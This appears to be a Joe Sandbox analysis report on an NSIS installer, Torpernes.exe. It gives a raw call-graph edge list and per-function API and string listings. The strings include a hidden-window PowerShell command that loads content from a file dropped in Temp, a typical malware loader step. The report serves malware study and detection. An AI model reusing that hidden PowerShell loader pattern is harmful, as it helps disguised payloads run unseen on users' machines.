3557 402da9 3578 402db9 3557->3578 3654 405e19 lstrcpynW 3557->3654 3559 402dcf 3560 4058b0 2 API calls 3559->3560 3561 402dd5 3560->3561 3655 405e19 lstrcpynW 3561->3655 3563 402de0 GetFileSize 3564 402edc 3563->3564 3576 402df7 3563->3576 3656 402d05 3564->3656 3566 402ee5 3568 402f15 GlobalAlloc 3566->3568 3566->3578 3668 4031b4 SetFilePointer 3566->3668 3567 40319e ReadFile 3567->3576 3667 4031b4 SetFilePointer 3568->3667 3570 402f48 3574 402d05 6 API calls 3570->3574 3572 402efe 3575 40319e ReadFile 3572->3575 3573 402f30 3577 402fa2 37 API calls 3573->3577 3574->3578 3579 402f09 3575->3579 3576->3564 3576->3567 3576->3570 3576->3578 3580 402d05 6 API calls 3576->3580 3581 402f3c 3577->3581 3578->3491 3579->3568 3579->3578 3580->3576 3581->3578 3581->3581 3582 402f79 SetFilePointer 3581->3582 3582->3578 3584 406183 3 API calls 3583->3584 3585 4037c0 3584->3585 3586 4037c6 3585->3586 3587 4037d8 3585->3587 3678 405d60 wsprintfW 3586->3678 3588 405ce6 3 API calls 3587->3588 3589 403808 3588->3589 3591 403827 lstrcatW 3589->3591 3593 405ce6 3 API calls 3589->3593 3592 4037d6 3591->3592 3669 403a82 3592->3669 3593->3591 3596 40596c 18 API calls 3597 403859 3596->3597 3598 4038ed 3597->3598 3600 405ce6 3 API calls 3597->3600 3599 40596c 18 API calls 3598->3599 3601 4038f3 3599->3601 3608 40388b 3600->3608 3602 403903 LoadImageW 3601->3602 3603 405e3b 18 API calls 3601->3603 3604 4039a9 3602->3604 3605 40392a RegisterClassW 3602->3605 3603->3602 3606 40140b 2 API calls 3604->3606 3609 403960 SystemParametersInfoW CreateWindowExW 3605->3609 3636 4039b3 3605->3636 3610 4039af 3606->3610 3607 4038ac lstrlenW 3612 4038e0 3607->3612 3613 4038ba lstrcmpiW 3607->3613 3608->3598 3608->3607 3611 405891 CharNextW 3608->3611 3609->3604 3618 403a82 19 API calls 3610->3618 3610->3636 3616 4038a9 3611->3616 3615 405864 3 API calls 3612->3615 3613->3612 3614 4038ca GetFileAttributesW 3613->3614 3617 4038d6 3614->3617 3619 4038e6 3615->3619 3616->3607 3617->3612 3620 4058b0 2 API 
calls 3617->3620 3621 4039c0 3618->3621 3679 405e19 lstrcpynW 3619->3679 3620->3612 3623 4039cc ShowWindow LoadLibraryW 3621->3623 3624 403a4f 3621->3624 3626 4039f2 GetClassInfoW 3623->3626 3627 4039eb LoadLibraryW 3623->3627 3625 405194 5 API calls 3624->3625 3628 403a55 3625->3628 3629 403a06 GetClassInfoW RegisterClassW 3626->3629 3630 403a1c DialogBoxParamW 3626->3630 3627->3626 3631 403a71 3628->3631 3632 403a59 3628->3632 3629->3630 3633 40140b 2 API calls 3630->3633 3634 40140b 2 API calls 3631->3634 3635 40140b 2 API calls 3632->3635 3632->3636 3633->3636 3634->3636 3635->3636 3636->3494 3637->3481 3638->3526 3639->3496 3641 4036ea 3640->3641 3642 4036dc CloseHandle 3640->3642 3681 403717 3641->3681 3642->3641 3645 4056a1 71 API calls 3646 403511 OleUninitialize 3645->3646 3646->3503 3646->3504 3647->3517 3648->3542 3650 405ac1 GetTickCount GetTempFileNameW 3649->3650 3651 4031fd 3650->3651 3652 405af7 3650->3652 3651->3483 3652->3650 3652->3651 3653->3557 3654->3559 3655->3563 3657 402d26 3656->3657 3658 402d0e 3656->3658 3661 402d36 GetTickCount 3657->3661 3662 402d2e 3657->3662 3659 402d17 DestroyWindow 3658->3659 3660 402d1e 3658->3660 3659->3660 3660->3566 3664 402d44 CreateDialogParamW ShowWindow 3661->3664 3665 402d67 3661->3665 3663 4061bc 2 API calls 3662->3663 3666 402d34 3663->3666 3664->3665 3665->3566 3666->3566 3667->3573 3668->3572 3670 403a96 3669->3670 3680 405d60 wsprintfW 3670->3680 3672 403b07 3673 405e3b 18 API calls 3672->3673 3674 403b13 SetWindowTextW 3673->3674 3675 403837 3674->3675 3676 403b2f 3674->3676 3675->3596 3676->3675 3677 405e3b 18 API calls 3676->3677 3677->3676 3678->3592 3679->3598 3680->3672 3682 403725 3681->3682 3683 4036ef 3682->3683 3684 40372a FreeLibrary GlobalFree 3682->3684 3683->3645 3684->3683 3684->3684 4046 402c7f 4047 402c91 SetTimer 4046->4047 4048 402caa 4046->4048 4047->4048 4049 402cff 4048->4049 4050 402cc4 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4048->4050 4050->4049 4051 4014ff 4052 401507 
4051->4052 4054 40151a 4051->4054 4053 402b1d 18 API calls 4052->4053 4053->4054 2980 405200 2981 405221 GetDlgItem GetDlgItem GetDlgItem 2980->2981 2982 4053aa 2980->2982 3026 40405c SendMessageW 2981->3026 2984 4053b3 GetDlgItem CreateThread FindCloseChangeNotification 2982->2984 2985 4053db 2982->2985 2984->2985 3060 405194 OleInitialize 2984->3060 2987 405406 2985->2987 2989 4053f2 ShowWindow ShowWindow 2985->2989 2990 40542b 2985->2990 2986 405291 2994 405298 GetClientRect GetSystemMetrics SendMessageW SendMessageW 2986->2994 2988 405412 2987->2988 2995 405466 2987->2995 2991 405440 ShowWindow 2988->2991 2992 40541a 2988->2992 3031 40405c SendMessageW 2989->3031 3035 40408e 2990->3035 2999 405460 2991->2999 3000 405452 2991->3000 3032 404000 2992->3032 3001 405306 2994->3001 3002 4052ea SendMessageW SendMessageW 2994->3002 2995->2990 3003 405474 SendMessageW 2995->3003 2998 405439 3005 404000 SendMessageW 2999->3005 3049 4050c1 3000->3049 3006 405319 3001->3006 3007 40530b SendMessageW 3001->3007 3002->3001 3003->2998 3008 40548d CreatePopupMenu 3003->3008 3005->2995 3027 404027 3006->3027 3007->3006 3010 405e3b 18 API calls 3008->3010 3011 40549d AppendMenuW 3010->3011 3013 4054ba GetWindowRect 3011->3013 3014 4054cd TrackPopupMenu 3011->3014 3012 405329 3015 405332 ShowWindow 3012->3015 3016 405366 GetDlgItem SendMessageW 3012->3016 3013->3014 3014->2998 3017 4054e8 3014->3017 3018 405355 3015->3018 3019 405348 ShowWindow 3015->3019 3016->2998 3020 40538d SendMessageW SendMessageW 3016->3020 3021 405504 SendMessageW 3017->3021 3030 40405c SendMessageW 3018->3030 3019->3018 3020->2998 3021->3021 3022 405521 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3021->3022 3024 405546 SendMessageW 3022->3024 3024->3024 3025 40556f GlobalUnlock SetClipboardData CloseClipboard 3024->3025 3025->2998 3026->2986 3028 405e3b 18 API calls 3027->3028 3029 404032 SetDlgItemTextW 3028->3029 3029->3012 3030->3016 3031->2987 3033 404007 3032->3033 3034 40400d SendMessageW 
3032->3034 3033->3034 3034->2990 3036 40412f 3035->3036 3037 4040a6 GetWindowLongW 3035->3037 3036->2998 3037->3036 3038 4040b7 3037->3038 3039 4040c6 GetSysColor 3038->3039 3040 4040c9 3038->3040 3039->3040 3041 4040d9 SetBkMode 3040->3041 3042 4040cf SetTextColor 3040->3042 3043 4040f1 GetSysColor 3041->3043 3044 4040f7 3041->3044 3042->3041 3043->3044 3045 404108 3044->3045 3046 4040fe SetBkColor 3044->3046 3045->3036 3047 404122 CreateBrushIndirect 3045->3047 3048 40411b DeleteObject 3045->3048 3046->3045 3047->3036 3048->3047 3050 4050dc 3049->3050 3059 40517e 3049->3059 3051 4050f8 lstrlenW 3050->3051 3052 405e3b 18 API calls 3050->3052 3053 405121 3051->3053 3054 405106 lstrlenW 3051->3054 3052->3051 3055 405134 3053->3055 3056 405127 SetWindowTextW 3053->3056 3057 405118 lstrcatW 3054->3057 3054->3059 3058 40513a SendMessageW SendMessageW SendMessageW 3055->3058 3055->3059 3056->3055 3057->3053 3058->3059 3059->2999 3067 404073 3060->3067 3062 4051de 3063 404073 SendMessageW 3062->3063 3065 4051f0 OleUninitialize 3063->3065 3064 4051b7 3064->3062 3070 401389 3064->3070 3068 40408b 3067->3068 3069 40407c SendMessageW 3067->3069 3068->3064 3069->3068 3072 401390 3070->3072 3071 4013fe 3071->3064 3072->3071 3073 4013cb MulDiv SendMessageW 3072->3073 3073->3072 4055 401000 4056 401037 BeginPaint GetClientRect 4055->4056 4057 40100c DefWindowProcW 4055->4057 4058 4010f3 4056->4058 4060 401179 4057->4060 4061 401073 CreateBrushIndirect FillRect DeleteObject 4058->4061 4062 4010fc 4058->4062 4061->4058 4063 401102 CreateFontIndirectW 4062->4063 4064 401167 EndPaint 4062->4064 4063->4064 4065 401112 6 API calls 4063->4065 4064->4060 4065->4064 4066 401a00 4067 402b3a 18 API calls 4066->4067 4068 401a09 ExpandEnvironmentStringsW 4067->4068 4069 401a1d 4068->4069 4071 401a30 4068->4071 4070 401a22 lstrcmpW 4069->4070 4069->4071 4070->4071 4072 401b01 4073 402b3a 18 API calls 4072->4073 4074 401b08 4073->4074 4075 402b1d 18 API calls 4074->4075 4076 401b11 wsprintfW 
4075->4076 4077 4029c7 4076->4077 4078 401f08 4079 402b3a 18 API calls 4078->4079 4080 401f0f GetFileVersionInfoSizeW 4079->4080 4081 401f36 GlobalAlloc 4080->4081 4083 401f8c 4080->4083 4082 401f4a GetFileVersionInfoW 4081->4082 4081->4083 4082->4083 4084 401f59 VerQueryValueW 4082->4084 4084->4083 4085 401f72 4084->4085 4089 405d60 wsprintfW 4085->4089 4087 401f7e 4090 405d60 wsprintfW 4087->4090 4089->4087 4090->4083 4098 401491 4099 4050c1 25 API calls 4098->4099 4100 401498 4099->4100 4101 402295 4102 402b3a 18 API calls 4101->4102 4103 4022a4 4102->4103 4104 402b3a 18 API calls 4103->4104 4105 4022ad 4104->4105 4106 402b3a 18 API calls 4105->4106 4107 4022b7 GetPrivateProfileStringW 4106->4107 4108 404817 4109 404843 4108->4109 4110 404827 4108->4110 4112 404876 4109->4112 4113 404849 SHGetPathFromIDListW 4109->4113 4119 4055d9 GetDlgItemTextW 4110->4119 4115 404860 SendMessageW 4113->4115 4116 404859 4113->4116 4114 404834 SendMessageW 4114->4109 4115->4112 4118 40140b 2 API calls 4116->4118 4118->4115 4119->4114 3440 401718 3441 402b3a 18 API calls 3440->3441 3442 40171f SearchPathW 3441->3442 3443 40173a 3442->3443 4120 401f98 4121 401faa 4120->4121 4131 40205c 4120->4131 4122 402b3a 18 API calls 4121->4122 4124 401fb1 4122->4124 4123 401423 25 API calls 4129 402197 4123->4129 4125 402b3a 18 API calls 4124->4125 4126 401fba 4125->4126 4127 401fd0 LoadLibraryExW 4126->4127 4128 401fc2 GetModuleHandleW 4126->4128 4130 401fe1 4127->4130 4127->4131 4128->4127 4128->4130 4140 4061ef WideCharToMultiByte 4130->4140 4131->4123 4134 401ff2 4137 401423 25 API calls 4134->4137 4138 402002 4134->4138 4135 40202b 4136 4050c1 25 API calls 4135->4136 4136->4138 4137->4138 4138->4129 4139 40204e FreeLibrary 4138->4139 4139->4129 4141 406219 GetProcAddress 4140->4141 4142 401fec 4140->4142 4141->4142 4142->4134 4142->4135 3466 40159b 3467 402b3a 18 API calls 3466->3467 3468 4015a2 SetFileAttributesW 3467->3468 3469 4015b4 3468->3469 4143 40149e 4144 4014ac PostQuitMessage 
4143->4144 4145 40223e 4143->4145 4144->4145 4146 4021a0 4147 402b3a 18 API calls 4146->4147 4148 4021a6 4147->4148 4149 402b3a 18 API calls 4148->4149 4150 4021af 4149->4150 4151 402b3a 18 API calls 4150->4151 4152 4021b8 4151->4152 4153 40615c 2 API calls 4152->4153 4154 4021c1 4153->4154 4155 4021d2 lstrlenW lstrlenW 4154->4155 4159 4021c5 4154->4159 4157 4050c1 25 API calls 4155->4157 4156 4050c1 25 API calls 4160 4021cd 4156->4160 4158 402210 SHFileOperationW 4157->4158 4158->4159 4158->4160 4159->4156 4159->4160 4161 401b22 4162 401b73 4161->4162 4163 401b2f 4161->4163 4164 401b78 4162->4164 4165 401b9d GlobalAlloc 4162->4165 4166 40222b 4163->4166 4170 401b46 4163->4170 4174 401bb8 4164->4174 4182 405e19 lstrcpynW 4164->4182 4167 405e3b 18 API calls 4165->4167 4168 405e3b 18 API calls 4166->4168 4167->4174 4169 402238 4168->4169 4176 4055f5 MessageBoxIndirectW 4169->4176 4180 405e19 lstrcpynW 4170->4180 4173 401b8a GlobalFree 4173->4174 4175 401b55 4181 405e19 lstrcpynW 4175->4181 4176->4174 4178 401b64 4183 405e19 lstrcpynW 4178->4183 4180->4175 4181->4178 4182->4173 4183->4174 4184 4029a2 SendMessageW 4185 4029c7 4184->4185 4186 4029bc InvalidateRect 4184->4186 4186->4185 3074 401924 3075 401926 3074->3075 3076 402b3a 18 API calls 3075->3076 3077 40192b 3076->3077 3080 4056a1 3077->3080 3119 40596c 3080->3119 3083 4056e0 3086 40580b 3083->3086 3133 405e19 lstrcpynW 3083->3133 3084 4056c9 DeleteFileW 3085 401934 3084->3085 3086->3085 3152 40615c FindFirstFileW 3086->3152 3088 405706 3089 405719 3088->3089 3090 40570c lstrcatW 3088->3090 3134 4058b0 lstrlenW 3089->3134 3091 40571f 3090->3091 3094 40572f lstrcatW 3091->3094 3096 40573a lstrlenW FindFirstFileW 3091->3096 3094->3096 3099 405800 3096->3099 3117 40575c 3096->3117 3097 405829 3155 405864 lstrlenW CharPrevW 3097->3155 3099->3086 3101 4057e3 FindNextFileW 3105 4057f9 FindClose 3101->3105 3101->3117 3102 405659 5 API calls 3104 40583b 3102->3104 3106 405855 3104->3106 3107 40583f 3104->3107 
3105->3099 3109 4050c1 25 API calls 3106->3109 3107->3085 3110 4050c1 25 API calls 3107->3110 3109->3085 3112 40584c 3110->3112 3111 4056a1 64 API calls 3111->3117 3114 405cb3 40 API calls 3112->3114 3113 4050c1 25 API calls 3113->3101 3115 405853 3114->3115 3115->3085 3116 4050c1 25 API calls 3116->3117 3117->3101 3117->3111 3117->3113 3117->3116 3138 405e19 lstrcpynW 3117->3138 3139 405659 3117->3139 3147 405cb3 3117->3147 3158 405e19 lstrcpynW 3119->3158 3121 40597d 3159 40590f CharNextW CharNextW 3121->3159 3124 4056c1 3124->3083 3124->3084 3125 4060ad 5 API calls 3131 405993 3125->3131 3126 4059c4 lstrlenW 3127 4059cf 3126->3127 3126->3131 3129 405864 3 API calls 3127->3129 3128 40615c 2 API calls 3128->3131 3130 4059d4 GetFileAttributesW 3129->3130 3130->3124 3131->3124 3131->3126 3131->3128 3132 4058b0 2 API calls 3131->3132 3132->3126 3133->3088 3135 4058be 3134->3135 3136 4058d0 3135->3136 3137 4058c4 CharPrevW 3135->3137 3136->3091 3137->3135 3137->3136 3138->3117 3165 405a60 GetFileAttributesW 3139->3165 3142 405686 3142->3117 3143 405674 RemoveDirectoryW 3145 405682 3143->3145 3144 40567c DeleteFileW 3144->3145 3145->3142 3146 405692 SetFileAttributesW 3145->3146 3146->3142 3168 406183 GetModuleHandleA 3147->3168 3151 405cdb 3151->3117 3153 406172 FindClose 3152->3153 3154 405825 3152->3154 3153->3154 3154->3085 3154->3097 3156 405880 lstrcatW 3155->3156 3157 40582f 3155->3157 3156->3157 3157->3102 3158->3121 3160 40592c 3159->3160 3162 40593e 3159->3162 3161 405939 CharNextW 3160->3161 3160->3162 3164 405962 3161->3164 3163 405891 CharNextW 3162->3163 3162->3164 3163->3162 3164->3124 3164->3125 3166 405a72 SetFileAttributesW 3165->3166 3167 405665 3165->3167 3166->3167 3167->3142 3167->3143 3167->3144 3169 4061aa GetProcAddress 3168->3169 3170 40619f LoadLibraryA 3168->3170 3171 405cba 3169->3171 3170->3169 3170->3171 3171->3151 3172 405b37 lstrcpyW 3171->3172 3173 405b60 3172->3173 3174 405b86 GetShortPathNameW 3172->3174 3197 405a85 
GetFileAttributesW CreateFileW 3173->3197 3176 405b9b 3174->3176 3177 405cad 3174->3177 3176->3177 3179 405ba3 wsprintfA 3176->3179 3177->3151 3178 405b6a CloseHandle GetShortPathNameW 3178->3177 3180 405b7e 3178->3180 3181 405e3b 18 API calls 3179->3181 3180->3174 3180->3177 3182 405bcb 3181->3182 3198 405a85 GetFileAttributesW CreateFileW 3182->3198 3184 405bd8 3184->3177 3185 405be7 GetFileSize GlobalAlloc 3184->3185 3186 405ca6 CloseHandle 3185->3186 3187 405c09 3185->3187 3186->3177 3199 405b08 ReadFile 3187->3199 3192 405c28 lstrcpyA 3195 405c4a 3192->3195 3193 405c3c 3194 4059ea 4 API calls 3193->3194 3194->3195 3196 405c81 SetFilePointer WriteFile GlobalFree 3195->3196 3196->3186 3197->3178 3198->3184 3200 405b26 3199->3200 3200->3186 3201 4059ea lstrlenA 3200->3201 3202 405a2b lstrlenA 3201->3202 3203 405a33 3202->3203 3204 405a04 lstrcmpiA 3202->3204 3203->3192 3203->3193 3204->3203 3205 405a22 CharNextA 3204->3205 3205->3202 4194 402224 4195 40222b 4194->4195 4198 40223e 4194->4198 4196 405e3b 18 API calls 4195->4196 4197 402238 4196->4197 4199 4055f5 MessageBoxIndirectW 4197->4199 4199->4198 4207 402729 4208 4029c7 4207->4208 4209 402730 4207->4209 4210 402736 FindClose 4209->4210 4210->4208 4218 401cab 4219 402b1d 18 API calls 4218->4219 4220 401cb2 4219->4220 4221 402b1d 18 API calls 4220->4221 4222 401cba GetDlgItem 4221->4222 4223 4024e8 4222->4223 4224 4016af 4225 402b3a 18 API calls 4224->4225 4226 4016b5 GetFullPathNameW 4225->4226 4227 4016cf 4226->4227 4233 4016f1 4226->4233 4230 40615c 2 API calls 4227->4230 4227->4233 4228 401706 GetShortPathNameW 4229 4029c7 4228->4229 4231 4016e1 4230->4231 4231->4233 4234 405e19 lstrcpynW 4231->4234 4233->4228 4233->4229 4234->4233 3322 402331 3323 402337 3322->3323 3324 402b3a 18 API calls 3323->3324 3325 402349 3324->3325 3326 402b3a 18 API calls 3325->3326 3327 402353 RegCreateKeyExW 3326->3327 3328 40237d 3327->3328 3338 402793 3327->3338 3329 402b3a 18 API calls 3328->3329 3331 402398 3328->3331 3332 

                                            Control-flow Graph
                                            • Graph for the function starting at 004031FF (rendered graph and raw edge list not reproduced; the executed API calls are listed below)
                                            APIs
                                            • #17.COMCTL32 ref: 0040321E
                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403229
                                            • OleInitialize.OLE32(00000000), ref: 00403230
                                              • Part of subcall function 00406183: GetModuleHandleA.KERNEL32(?,?,00000020,00403242,00000009), ref: 00406195
                                              • Part of subcall function 00406183: LoadLibraryA.KERNELBASE(?,?,00000020,00403242,00000009), ref: 004061A0
                                              • Part of subcall function 00406183: GetProcAddress.KERNEL32(00000000,?), ref: 004061B1
                                            • SHGetFileInfoW.SHELL32(00420670,00000000,?,000002B4,00000000), ref: 00403258
                                              • Part of subcall function 00405E19: lstrcpynW.KERNEL32(?,?,00000400,0040326D,004281C0,NSIS Error), ref: 00405E26
                                            • GetCommandLineW.KERNEL32(004281C0,NSIS Error), ref: 0040326D
                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Torpernes.exe",00000000), ref: 00403280
                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Torpernes.exe",00000020), ref: 004032A8
                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004033E0
                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033F1
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033FD
                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403411
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403419
                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040342A
                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403432
                                            • DeleteFileW.KERNELBASE(1033), ref: 00403446
                                            • OleUninitialize.OLE32(?), ref: 00403511
                                            • ExitProcess.KERNEL32 ref: 00403531
                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp), ref: 0040353D
                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Torpernes.exe",00000000,?), ref: 00403549
                                            • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403555
                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040355C
                                            • DeleteFileW.KERNEL32(0041FE70,0041FE70,?,"powershell.exe" -windowstyle hidden,?), ref: 004035B6
                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\Torpernes.exe,0041FE70,00000001), ref: 004035CA
                                            • CloseHandle.KERNEL32(00000000,0041FE70,0041FE70,?,0041FE70,00000000), ref: 004035F7
                                            • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 00403651
                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 004036A9
                                            • ExitProcess.KERNEL32 ref: 004036CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                            • String ID: "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Beneme56.Gem';$Fortifikatori$"C:\Users\user\Desktop\Torpernes.exe"$"powershell.exe" -windowstyle hidden$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes$C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems$C:\Users\user\Desktop$C:\Users\user\Desktop\Torpernes.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                            • API String ID: 4107622049-495355796
                                            • Opcode ID: a1a8e6abd44abb64edcd91f4bbb04e8a1c5cf9de9732d5afc3bdbc434496ca7e
                                            • Instruction ID: c7a68613e809908f7bc30205db7760ac1a3991b426edab895fb3ee5f362a6f40
                                            • Opcode Fuzzy Hash: a1a8e6abd44abb64edcd91f4bbb04e8a1c5cf9de9732d5afc3bdbc434496ca7e
                                            • Instruction Fuzzy Hash: CEC1E530604210BAD7206F659C49A2B3EACEB45705F10497FF884B62E2DB7D9A41CB6E

                                            Control-flow Graph
                                            • Graph for the function starting at 00405200 (rendered graph and raw edge list not reproduced; the executed API calls are listed below)
                                            APIs
                                            • GetDlgItem.USER32(?,00000403), ref: 0040525E
                                            • GetDlgItem.USER32(?,000003EE), ref: 0040526D
                                            • GetClientRect.USER32(?,?), ref: 004052AA
                                            • GetSystemMetrics.USER32(00000002), ref: 004052B1
                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004052D2
                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004052E3
                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004052F6
                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405304
                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405317
                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405339
                                            • ShowWindow.USER32(?,00000008), ref: 0040534D
                                            • GetDlgItem.USER32(?,000003EC), ref: 0040536E
                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040537E
                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405397
                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004053A3
                                            • GetDlgItem.USER32(?,000003F8), ref: 0040527C
                                              • Part of subcall function 0040405C: SendMessageW.USER32(00000028,?,00000001,00403E88), ref: 0040406A
                                            • GetDlgItem.USER32(?,000003EC), ref: 004053C0
                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005194,00000000), ref: 004053CE
                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053D5
                                            • ShowWindow.USER32(00000000), ref: 004053F9
                                            • ShowWindow.USER32(?,00000008), ref: 004053FE
                                            • ShowWindow.USER32(00000008), ref: 00405448
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040547C
                                            • CreatePopupMenu.USER32 ref: 0040548D
                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004054A1
                                            • GetWindowRect.USER32(?,?), ref: 004054C1
                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DA
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405512
                                            • OpenClipboard.USER32(00000000), ref: 00405522
                                            • EmptyClipboard.USER32 ref: 00405528
                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405534
                                            • GlobalLock.KERNEL32(00000000), ref: 0040553E
                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405552
                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405572
                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040557D
                                            • CloseClipboard.USER32 ref: 00405583
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                            • String ID: {
                                            • API String ID: 4154960007-366298937
                                            • Opcode ID: 8b07eba9ac9e112bbeb41a4cd2db4a6c343dd4ab179f28f7181e117c9139910e
                                            • Instruction ID: 1a60e1c93915faf36031e484e8dc4f5f0dc3400a4e98dd575bab4ae93e5693cd
                                            • Opcode Fuzzy Hash: 8b07eba9ac9e112bbeb41a4cd2db4a6c343dd4ab179f28f7181e117c9139910e
                                            • Instruction Fuzzy Hash: 7CB14B71900209FFEB21AF60DD89AAE7B79FB04355F00403AFA05B61A0C7755E52DF69

                                            Control-flow Graph
                                            • Graph for the function starting at 00405E3B (rendered graph and raw edge list not reproduced; the executed API calls are listed below)
                                            APIs
                                            • GetVersion.KERNEL32(00000000,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,?,004050F8,Execute: "powershell.exe" -windowstyle hidden "$Rligstes=Get-Content 'C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreri,00000000,00000000,0040FE60), ref: 00405EFE
                                            • GetSystemDirectoryW.KERNEL32(Execute: ,00000400), ref: 00405F7C
                                            • GetWindowsDirectoryW.KERNEL32(Execute: ,00000400), ref: 00405F8F
                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405FCB
